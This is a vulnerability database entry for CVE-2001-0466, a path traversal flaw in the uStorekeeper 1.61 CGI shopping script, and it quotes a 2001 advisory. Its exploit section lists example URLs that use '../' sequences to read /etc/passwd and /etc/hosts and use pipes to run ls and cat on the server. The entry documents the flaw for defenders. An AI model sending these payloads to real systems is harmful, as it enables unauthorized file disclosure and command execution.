uStorekeeper Directory Traversal Vulnerability


Vulnerability ID: 1106275
Vulnerability type: Path traversal
Published: 2001-04-02
Updated: 2001-06-18
CVE ID: CVE-2001-0466
CNNVD-ID: CNNVD-200106-107
Platform: CGI
CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/20725
https://www.securityfocus.com/bid/88984
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-107
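|Vulnerability details
uStorekeeper version 1.61 contains a directory traversal vulnerability. A remote attacker can read arbitrary files by supplying .. (dot dot) sequences in the file parameter.
|Exploit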
source: http://www.securityfocus.com/bid/2536/info

A vulnerability exists in versions of uStorekeeper Online Shopping System from Microburst Technologies.

The script fails to properly validate user-supplied input, allowing remote users to submit URLs containing '/../' sequences and arbitrary filenames or commands, which will be executed or displayed with the privilege level of the webserver user.

This permits the remote user to request files and execute commands from arbitrary locations on the host filesystem, outside the script's normal directory scope.

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl|
|Affected products
Microburst uStorekeeper Online Shopping System 1.61
|References

Source: BUGTRAQ
Name: 20010403newadvisory
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=98633176230748&w=2
